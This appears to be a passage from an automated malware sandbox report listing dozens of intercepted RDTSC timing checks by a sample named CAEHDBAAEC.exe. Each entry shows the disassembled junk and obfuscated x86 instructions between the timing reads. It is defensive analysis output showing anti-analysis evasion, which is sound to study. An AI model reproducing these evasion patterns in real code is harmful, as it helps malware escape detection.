Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B9 second address: 7255C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255C2 second address: 7255D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jbe 00007FB4246CBDE6h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255D6 second address: 7255DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255DB second address: 725609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f ja 00007FB4246CBDF7h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71715C second address: 717162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 717162 second address: 71717A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FB4246CBDE6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71717A second address: 7171B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007FB424542859h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB424542846h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450D6 second address: 7450DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450DA second address: 7450E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7450E0 second address: 745113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FB4246CBDE6h 0x00000009 jnl 00007FB4246CBDE6h 0x0000000f jmp 00007FB4246CBDF6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FB4246CBDE6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745113 second address: 745127 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007FB424542846h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745127 second address: 74512B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 74512B second address: 745136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C43 second address: 745C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FB4246CBDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C52 second address: 745C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 745C58 second address: 745C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460CB second address: 7460D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460D1 second address: 7460DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460DF second address: 7460E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7460E5 second address: 746120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4246CBDE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FB4246CBDF5h 0x00000011 jmp 00007FB4246CBDF3h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746AF8 second address: 746AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746DDF second address: 746DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746DE3 second address: 746E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542855h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E00 second address: 746E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E04 second address: 746E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 746E0E second address: 746E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71208E second address: 712092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 712092 second address: 712096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 712096 second address: 71209C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750765 second address: 750769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750769 second address: 750783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Dh 0x00000007 jng 00007FB424542846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750783 second address: 750788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750788 second address: 750794 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB42454284Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 750794 second address: 75079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BAC second address: 752BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jo 00007FB42454285Ah 0x0000000f jmp 00007FB424542854h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BD9 second address: 752BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BDD second address: 752BE7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752BE7 second address: 752C0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 adc edi, 491E0B25h 0x0000000f call 00007FB4246CBDE9h 0x00000014 jl 00007FB4246CBDF4h 0x0000001a pushad 0x0000001b je 00007FB4246CBDE6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752C0E second address: 752C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jng 00007FB42454284Eh 0x0000000c push edi 0x0000000d jbe 00007FB424542846h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b jmp 00007FB424542850h 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752C3A second address: 752C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752EEA second address: 752EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752EEF second address: 752F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752F05 second address: 752F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752FC5 second address: 752FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 752FCF second address: 752FE1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 753061 second address: 753088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4246CBDE6h 0x0000000a popad 0x0000000b jmp 00007FB4246CBDF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7538FE second address: 753908 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB42454284Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 754CCF second address: 754CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 756608 second address: 75660C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7570E4 second address: 7570E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75BC88 second address: 75BC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75BC8C second address: 75BC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C1E0 second address: 75C223 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB424542848h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d sbb ebx, 43AC95B1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FB424542848h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov bl, 52h 0x00000031 push eax 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop esi 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D26A second address: 75D271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75F143 second address: 75F148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75F148 second address: 75F152 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4246CBDECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C3A0 second address: 75C3D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007FB424542859h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D3E9 second address: 75D489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FB4246CBDE8h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007FB4246CBDF5h 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 sub dword ptr [ebp+122D1ADAh], ebx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e add bx, 0D95h 0x00000033 mov ebx, 27520FA1h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov bl, 9Bh 0x00000041 mov eax, dword ptr [ebp+122D0801h] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007FB4246CBDE8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov dword ptr [ebp+122D308Ah], ebx 0x00000067 push FFFFFFFFh 0x00000069 mov bx, di 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jng 00007FB4246CBDE6h 0x00000076 jmp 00007FB4246CBDEFh 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75D489 second address: 75D48E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 760184 second address: 7601CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FB4246CBDE8h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000018h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f push 00000000h 0x00000021 mov bx, 916Eh 0x00000025 mov ebx, edi 0x00000027 push 00000000h 0x00000029 jmp 00007FB4246CBDF4h 0x0000002e xchg eax, esi 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4B9 second address: 75C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7601CD second address: 7601EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4BD second address: 75C4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4C1 second address: 75C4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 761245 second address: 76124B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 760327 second address: 76032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75C4C7 second address: 75C4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB424542848h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76124B second address: 76124F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76032B second address: 7603D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FB424542848h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 and bh, FFFFFFB6h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e sbb bx, 86BBh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FB424542848h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D2AA9h] 0x0000005a mov eax, dword ptr [ebp+122D0841h] 0x00000060 call 00007FB42454284Ah 0x00000065 jmp 00007FB424542856h 0x0000006a pop ebx 0x0000006b push FFFFFFFFh 0x0000006d mov dword ptr [ebp+122D1B07h], ebx 0x00000073 nop 0x00000074 pushad 0x00000075 jbe 00007FB42454284Ch 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76124F second address: 761253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7642A3 second address: 7642E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB424542846h 0x00000009 jp 00007FB424542846h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jno 00007FB42454284Eh 0x00000019 nop 0x0000001a mov ebx, dword ptr [ebp+122D3461h] 0x00000020 push 00000000h 0x00000022 sub ebx, dword ptr [ebp+122D3080h] 0x00000028 push 00000000h 0x0000002a mov edi, 112788B5h 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push esi 0x00000033 pop esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7642E1 second address: 7642F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76532D second address: 765331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765331 second address: 765335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765335 second address: 765357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB424542856h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765357 second address: 76535D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76642C second address: 766430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766430 second address: 76643A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76552F second address: 765535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76643A second address: 76643F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765535 second address: 765539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76643F second address: 766445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
